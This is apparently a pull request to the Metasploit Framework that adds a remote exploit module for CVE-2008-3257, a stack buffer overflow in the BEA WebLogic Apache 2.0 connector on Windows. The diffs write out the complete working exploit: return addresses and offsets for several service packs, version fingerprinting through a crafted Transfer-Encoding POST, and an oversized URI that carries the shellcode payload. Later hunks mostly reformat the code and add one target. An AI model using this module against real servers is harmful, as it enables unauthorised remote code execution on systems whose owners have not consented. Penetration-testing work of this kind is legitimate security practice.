### PR TITLE
Oracle bea post bof

### DIFF
--- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb
+++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb
@@ -89,16 +89,15 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 
 		my_data = rand_text_alpha(rand(5) + 8)
-		res = send_request_cgi(
-						{
-							'method'  => 'POST',
-							'uri'     => target_uri.path,
-							'headers'	=>
-								{
-									'Transfer-Encoding' => my_data
-								},
-							'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
-						})
+		res = send_request_cgi({
+				'method'  => 'POST',
+				'uri'     => target_uri.path,
+				'headers'	=>
+					{
+						'Transfer-Encoding' => my_data
+					},
+				'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
+		})
 
 		if res and res.code == 200
 
@@ -149,11 +148,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		sploit << [my_target.ret].pack("V")
 		sploit << payload.encoded
 
-		send_request_cgi(
-			{
-				'method'  => 'POST',
-				'uri'     => "#{uri} #{sploit}",
-			})
+		send_request_cgi({
+			'method'  => 'POST',
+			'uri'     => "#{uri} #{sploit}",
+		})
 
 		handler
 
@@ -165,15 +163,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		my_data = rand_text_alpha(rand(5) + 8)
 		res = send_request_cgi(
+				{
+					'method'  => 'POST',
+					'uri'     => target_uri.path,
+					'headers'	=>
 						{
-							'method'  => 'POST',
-							'uri'     => target_uri.path,
-							'headers'	=>
-								{
-									'Transfer-Encoding' => my_data
-								},
-							'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
-						})
+							'Transfer-Encoding' => my_data
+						},
+					'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
+				})
 
 		if res and res.code == 200
 			# BEA WebLogic 8.1 SP6 - mod_wl_20.so

--- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb
+++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb
@@ -25,6 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				requests resulting in a buffer overflow due to the insecure usage
 				of sprintf.
 
+				The Weblogic Apache plugin version is fingerprinted with a POST
+				request containing a specially crafted Transfer-Encoding header.
+
 				At this moment this module works over Windows systems without DEP
 				and has been tested with Windows 2000 / XP.
 			},
@@ -78,24 +81,26 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options(
 			[
-				OptString.new('PATH', [ true,  "The URI path to a jsp or object provided by Weblogic", '/index.jsp'])
+				OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),
 			], self.class)
 
 	end
 
 	def check
 
+		my_data = rand_text_alpha(rand(5) + 8)
 		res = send_request_cgi(
-			{
-				'method'  => 'POST',
-				'uri'     => datastore['PATH'],
-				'headers'	=>
-					{
-						'Content-Length'		=> -1
-					}
-			})
+						{
+							'method'  => 'POST',
+							'uri'     => target_uri.path,
+							'headers'	=>
+								{
+									'Transfer-Encoding' => my_data
+								},
+							'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
+						})
 
-		if res and res.code == 500
+		if res and res.code == 200
 
 			# BEA WebLogic 8.1 SP6 - mod_wl_20.so
 			if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
@@ -139,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		uri = datastore['PATH']
+		uri = target_uri.path
 		sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)
 		sploit << [my_target.ret].pack("V")
 		sploit << payload.encoded
@@ -158,17 +163,19 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		return target if target.name != 'Automatic'
 
+		my_data = rand_text_alpha(rand(5) + 8)
 		res = send_request_cgi(
 						{
 							'method'  => 'POST',
-							'uri'     => datastore['PATH'],
+							'uri'     => target_uri.path,
 							'headers'	=>
 								{
-									'Content-Length'		=> -1
-								}
+									'Transfer-Encoding' => my_data
+								},
+							'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
 						})
 
-		if res and res.code == 500
+		if res and res.code == 200
 			# BEA WebLogic 8.1 SP6 - mod_wl_20.so
 			if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
 					res.body =~ /Change Number:<\/B> <I>779586/

--- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb
+++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb
@@ -66,6 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Offset' =>  4102
 						}
 					],
+					[  'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
+						{
+							'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so
+							'Offset' =>  4102
+						}
+					]
 				],
 			'DisclosureDate' => 'Jul 17 2008',
 			'DefaultTarget'  => 0))
@@ -102,6 +108,13 @@ class Metasploit3 < Msf::Exploit::Remote
 					res.body =~ /Change Number:<\/B> <I>616810/
 				return Exploit::CheckCode::Vulnerable
 			end
+
+			# BEA WebLogic 8.1 SP4 - mod_wl_20.so
+			if res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
+					res.body =~ /Change Number:<\/B> <I>452998/
+				return Exploit::CheckCode::Vulnerable
+			end
+
 			# Check for dates prior to patch release
 			if res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
 				build_date = Date.parse($1)
@@ -164,6 +177,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			elsif res.body =~ /Build date\/time:<\/B> <I>Aug  5 2005 11:19:57/ and
 					res.body =~ /Change Number:<\/B> <I>616810/
 				return targets[2]
+			elsif res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
+					res.body =~ /Change Number:<\/B> <I>452998/
+				return targets[3]
 			end
 		end
 

--- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb
+++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb
@@ -1,0 +1,173 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	HttpFingerprint = { :pattern => [ /Apache/ ] }
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack based buffer overflow in the BEA
+				Weblogic Apache plugin.
+
+				The connector fails to properly handle specially crafted HTTP POST
+				requests resulting in a buffer overflow due to the insecure usage
+				of sprintf.
+
+				At this moment this module works over Windows systems without DEP
+				and has been tested with Windows 2000 / XP.
+			},
+			'Author'         =>
+				[
+					'KingCope', # Vulnerability Discovery and PoC
+					'juan vazquez', # Metasploit Module
+				],
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'CVE', '2008-3257' ],
+					[ 'OSVDB', '47096' ],
+					[ 'BID', '30273' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Privileged'     => true,
+			'Platform'       => 'win',
+			'Payload'        =>
+				{
+					'Space'    => 4000,
+					'BadChars' => "\x00\x0d\x0a\x3f"
+				},
+			'Targets'        =>
+				[
+					[ 'Automatic', {} ],
+					[  'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
+						{
+							'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so
+							'Offset' =>  4102
+						}
+					],
+					[  'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
+						{
+							'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so
+							'Offset' =>  4102
+						}
+					],
+				],
+			'DisclosureDate' => 'Jul 17 2008',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('PATH', [ true,  "The URI path to a jsp or object provided by Weblogic", '/index.jsp'])
+			], self.class)
+
+	end
+
+	def check
+
+		res = send_request_cgi(
+			{
+				'method'  => 'POST',
+				'uri'     => datastore['PATH'],
+				'headers'	=>
+					{
+						'Content-Length'		=> -1
+					}
+			})
+
+		if res and res.code == 500
+
+			# BEA WebLogic 8.1 SP6 - mod_wl_20.so
+			if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
+					res.body =~ /Change Number:<\/B> <I>779586/
+				return Exploit::CheckCode::Vulnerable
+			end
+
+			# BEA WebLogic 8.1 SP5 - mod_wl_20.so
+			if res.body =~ /Build date\/time:<\/B> <I>Aug  5 2005 11:19:57/ and
+					res.body =~ /Change Number:<\/B> <I>616810/
+				return Exploit::CheckCode::Vulnerable
+			end
+			# Check for dates prior to patch release
+			if res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
+				build_date = Date.parse($1)
+				if build_date <= Date.parse("Jul 28 2008")
+					return Exploit::CheckCode::Appears
+				end
+			end
+
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+
+		# Autodetect BEA mod_wl version
+		my_target = get_target
+
+		# Avoid the attack if the victim doesn't have the same setup we're targeting
+		if my_target.nil?
+			print_error("BEA mod_weblogic not supported")
+			return
+		end
+
+		uri = datastore['PATH']
+		sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)
+		sploit << [my_target.ret].pack("V")
+		sploit << payload.encoded
+
+		send_request_cgi(
+			{
+				'method'  => 'POST',
+				'uri'     => "#{uri} #{sploit}",
+			})
+
+		handler
+
+	end
+
+	def get_target
+
+		return target if target.name != 'Automatic'
+
+		res = send_request_cgi(
+						{
+							'method'  => 'POST',
+							'uri'     => datastore['PATH'],
+							'headers'	=>
+								{
+									'Content-Length'		=> -1
+								}
+						})
+
+		if res and res.code == 500
+			# BEA WebLogic 8.1 SP6 - mod_wl_20.so
+			if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
+					res.body =~ /Change Number:<\/B> <I>779586/
+				return targets[1]
+			# BEA WebLogic 8.1 SP5 - mod_wl_20.so
+			elsif res.body =~ /Build date\/time:<\/B> <I>Aug  5 2005 11:19:57/ and
+					res.body =~ /Change Number:<\/B> <I>616810/
+				return targets[2]
+			end
+		end
+
+		return nil
+	end
+
+end


### PR DESCRIPTION
Exploit module for CVE-2008-3257. 

It exploits the BEA Weblogic connector for Apache 2.0. 

mod_weblogic plug-in version fingerprinting using a POST request with a specially crafted transfer-encoding header. It allows to auto-detect the target.

At this moment this exploit doesn't bypass DEP :\
